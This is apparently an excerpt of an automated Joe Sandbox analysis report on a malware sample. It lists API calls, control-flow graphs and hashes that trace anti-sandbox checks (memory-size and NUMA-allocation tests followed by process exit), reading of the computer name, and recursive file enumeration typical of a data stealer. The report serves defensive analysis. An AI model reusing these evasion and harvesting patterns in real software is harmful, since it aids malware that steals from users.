                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0062104D
                          • ExitProcess.KERNEL32 ref: 00621058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0062106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006210AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 91ac3ae5a62ee08a61537c027a6bf4051dc66e93052c5409a7a0b9d606fdd8e1
                          • Instruction ID: 286ab706b998506cfb0cd1382a0fac13a7d5f4016a4f0a699c7cfc00916305aa
                          • Opcode Fuzzy Hash: 91ac3ae5a62ee08a61537c027a6bf4051dc66e93052c5409a7a0b9d606fdd8e1
                          • Instruction Fuzzy Hash: A201D171780314BBE7204A656C5AFAB77AEB795B12F208414F744E72C0DAB5AE008A64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 63ee90-63eeb5 call 622930 2808 63eeb7-63eebf 2805->2808 2809 63eec9-63eecd call 626c40 2805->2809 2808->2809 2810 63eec1-63eec3 lstrcpy 2808->2810 2812 63eed2-63eee8 StrCmpCA 2809->2812 2810->2809 2813 63ef11-63ef18 call 622a20 2812->2813 2814 63eeea-63ef02 call 622a20 call 622930 2812->2814 2820 63ef20-63ef28 2813->2820 2824 63ef45-63efa0 call 622a20 * 10 2814->2824 2825 63ef04-63ef0c 2814->2825 2820->2820 2822 63ef2a-63ef37 call 622930 2820->2822 2822->2824 2829 63ef39 2822->2829 2825->2824 2828 63ef0e-63ef0f 2825->2828 2831 63ef3e-63ef3f lstrcpy 2828->2831 2829->2831 2831->2824
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0063EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0063EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: dac224252cc58ecb9114879c57012387dab811ed76fb482209ca58f5c1171ba7
                          • Instruction ID: 8ae8ce5eaae7060401f932fe8c8cc23f40c3d254690e2c9f1982e9f4d0632d3d
                          • Opcode Fuzzy Hash: dac224252cc58ecb9114879c57012387dab811ed76fb482209ca58f5c1171ba7
                          • Instruction Fuzzy Hash: C6216570A20657ABCBA1FF79EC5669E37A6AF10301F00556CB84ACBA46DE31DC408FD4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 6210c0-6210cb 2887 6210d0-6210dc 2886->2887 2889 6210de-6210f3 GlobalMemoryStatusEx 2887->2889 2890 621112-621114 ExitProcess 2889->2890 2891 6210f5-621106 2889->2891 2892 62111a-62111d 2891->2892 2893 621108 2891->2893 2893->2890 2894 62110a-621110 2893->2894 2894->2890 2894->2892
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 2d60c572197999f5bb38c271b1e16352c104300ce00e31cc055ef7ed919189b8
                          • Instruction ID: 589f37165d09558e33526bdc22d58ebe8323109f67a177be2f108e71a8c57fd5
                          • Opcode Fuzzy Hash: 2d60c572197999f5bb38c271b1e16352c104300ce00e31cc055ef7ed919189b8
                          • Instruction Fuzzy Hash: 09F02E7010CA5487E7146A64FC0D71DF7DAE732351F100929DEDAC62C0E634C8509D37

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 638c88-638cc4 StrCmpCA 2898 638cc6-638cc7 ExitProcess 2895->2898 2899 638ccd-638ce6 2895->2899 2901 638ee2-638eef call 622a20 2899->2901 2902 638cec-638cf1 2899->2902 2904 638cf6-638cf9 2902->2904 2905 638ec3-638edc 2904->2905 2906 638cff 2904->2906 2905->2901 2940 638cf3 2905->2940 2908 638d06-638d15 lstrlen 2906->2908 2909 638d84-638d92 StrCmpCA 2906->2909 2910 638da4-638db8 StrCmpCA 2906->2910 2911 638e88-638e9a lstrlen 2906->2911 2912 638e6f-638e7d StrCmpCA 2906->2912 2913 638d30-638d3f lstrlen 2906->2913 2914 638e56-638e64 StrCmpCA 2906->2914 2915 638d5a-638d69 lstrlen 2906->2915 2916 638dbd-638dcb StrCmpCA 2906->2916 2917 638ddd-638deb StrCmpCA 2906->2917 2918 638dfd-638e0b StrCmpCA 2906->2918 2919 638e1d-638e2b StrCmpCA 2906->2919 2920 638e3d-638e4b StrCmpCA 2906->2920 2929 638d17-638d1c call 622a20 2908->2929 2930 638d1f-638d2b call 622930 2908->2930 2909->2905 2924 638d98-638d9f 2909->2924 2910->2905 2934 638ea4-638eb0 call 622930 2911->2934 2935 638e9c-638ea1 call 622a20 2911->2935 2912->2905 2933 638e7f-638e86 2912->2933 2936 638d41-638d46 call 622a20 2913->2936 2937 638d49-638d55 call 622930 2913->2937 2914->2905 2932 638e66-638e6d 2914->2932 2921 638d73-638d7f call 622930 2915->2921 2922 638d6b-638d70 call 622a20 2915->2922 2916->2905 2925 638dd1-638dd8 2916->2925 2917->2905 2926 638df1-638df8 2917->2926 2918->2905 2927 638e11-638e18 2918->2927 2919->2905 2928 638e31-638e38 2919->2928 2920->2905 2931 638e4d-638e54 2920->2931 2955 638eb3-638eb5 2921->2955 2922->2921 2924->2905 2925->2905 2926->2905 2927->2905 2928->2905 2929->2930 2930->2955 2931->2905 2932->2905 2933->2905 2934->2955 2935->2934 2936->2937 2937->2955 2940->2904 2955->2905 2956 638eb7-638eb9 2955->2956 2956->2905 2957 638ebb-638ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 81de52243041817074d8e2975de3c6e02833152d24b349527f216c1c9cacc6ea
                          • Instruction ID: 5f20c7500c314fc8014dc7e2ff0c0ea206b3241595e271178a71d7eadd35f5fa
                          • Opcode Fuzzy Hash: 81de52243041817074d8e2975de3c6e02833152d24b349527f216c1c9cacc6ea
                          • Instruction Fuzzy Hash: CBE0DF60904346EBDF009BB9CC899C6BF7CBF44711F0488A9FD494B255EA74AC05C3A5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2958 642ad0-642b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 642b44-642b59 2958->2959 2960 642b24-642b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00642AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00642B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 72357002321d64c188bdce0dd3e81549b25e796e7d2240e56c4fdfed21fd8b96
                          • Instruction ID: f93886eff3b3331d241e2c577746efba11dfbf51a9788d695d70d0cf7602ed99
                          • Opcode Fuzzy Hash: 72357002321d64c188bdce0dd3e81549b25e796e7d2240e56c4fdfed21fd8b96
                          • Instruction Fuzzy Hash: 0A01D172A44708EBD710CF99EC45BAEFBB8F744B22F00026AF919E3780D778190487A1
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006323D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006323F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00632402
                          • lstrlen.KERNEL32(\*.*), ref: 0063240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00632436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00632486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: abf51c691cc42d061c890e75cdf227008c58f9d10ef5c9f54747fe7f642ac150
                          • Instruction ID: 3130bf44a85093153522f1b66b4d691941b4d7e8a6db5dd44d66e56f3742329d
                          • Opcode Fuzzy Hash: abf51c691cc42d061c890e75cdf227008c58f9d10ef5c9f54747fe7f642ac150
                          • Instruction Fuzzy Hash: E3A28D71901B27ABCB61AF65DCA9AEE77BABF04301F044128F849A7351DB38DD458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006216E2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062176C
                          • lstrcat.KERNEL32(00000000), ref: 00621776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006217A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006217EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006217F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621875
                          • lstrcat.KERNEL32(00000000), ref: 0062187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006218AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 006218F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006218FE
                          • lstrlen.KERNEL32(00651794), ref: 00621909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621929
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621966
                          • lstrlen.KERNEL32(\*.*), ref: 00621971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0062199A
                            • Part of subcall function 00644040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0064406D
                            • Part of subcall function 00644040: lstrcpy.KERNEL32(00000000,?), ref: 006440A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006219C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621A16
                          • lstrlen.KERNEL32(00651794), ref: 00621A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621A41
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621A81
                          • lstrlen.KERNEL32(00651794), ref: 00621A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621AAC
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00621B45
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 00621B70
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00621B8A
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621C03
                          • lstrlen.KERNEL32(00651794), ref: 00621C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621C31
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621C74
                          • lstrlen.KERNEL32(00651794), ref: 00621C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621CA2
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621CAE
                          • lstrlen.KERNEL32(?), ref: 00621CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00621CE9
                          • lstrlen.KERNEL32(00651794), ref: 00621CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621D14
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621DEB
                          • lstrlen.KERNEL32(00651794), ref: 00621DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621E19
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621E56
                          • lstrlen.KERNEL32(00651794), ref: 00621E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621E81
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621E8D
                          • lstrlen.KERNEL32(?), ref: 00621E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00621EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00621F45
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621F9F
                          • lstrlen.KERNEL32(01298B40), ref: 00621FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00621FE3
                          • lstrlen.KERNEL32(00651794), ref: 00621FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062200E
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00622042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062204D
                          • lstrlen.KERNEL32(00651794), ref: 00622058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622075
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00622081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: 37ee8c2093b3ed6bb8b66c9cbdd6ce5d5e3328425b844795c52b0a643476afa8
                          • Instruction ID: 3a737db60c4740e13882fbf1893f5609cceaffb542a5e49ad4975b008b95355c
                          • Opcode Fuzzy Hash: 37ee8c2093b3ed6bb8b66c9cbdd6ce5d5e3328425b844795c52b0a643476afa8
                          • Instruction Fuzzy Hash: 7F928571901A27EBCB219F65EC99AEE77BBBF15301F040118F809A7255DB38DD458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DBEF
                          • lstrlen.KERNEL32(00654CA8), ref: 0062DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC17
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 0062DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC4C
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DC8F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0062DCD0
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0062DCF0
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0062DD0A
                          • lstrlen.KERNEL32(0064CFEC), ref: 0062DD1D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DD47
